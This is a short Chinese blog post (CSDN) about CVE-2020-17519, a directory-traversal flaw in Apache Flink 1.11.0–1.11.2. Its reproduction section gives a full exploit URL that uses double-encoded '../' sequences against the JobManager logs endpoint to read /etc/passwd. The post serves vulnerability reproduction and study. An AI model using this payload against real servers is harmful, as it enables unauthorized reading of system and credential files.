Apache Flink jobmanager/logs 目录穿越漏洞(CVE-2020-17519)

这篇文章揭示了ApacheFlink1.11.0到1.11.2版本中的一个安全问题,攻击者可通过JobManager的REST接口获取到本地文件系统的敏感文件。复现方法和路径被详细描述。
摘要由CSDN通过智能技术生成

Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.11.0(以及 1.11.1 和 1.11.2 中发布的版本)中引入的一项更改允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

复现:

访问首页http://192.168.92.130:8081

exp利用

http://192.168.92.130:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值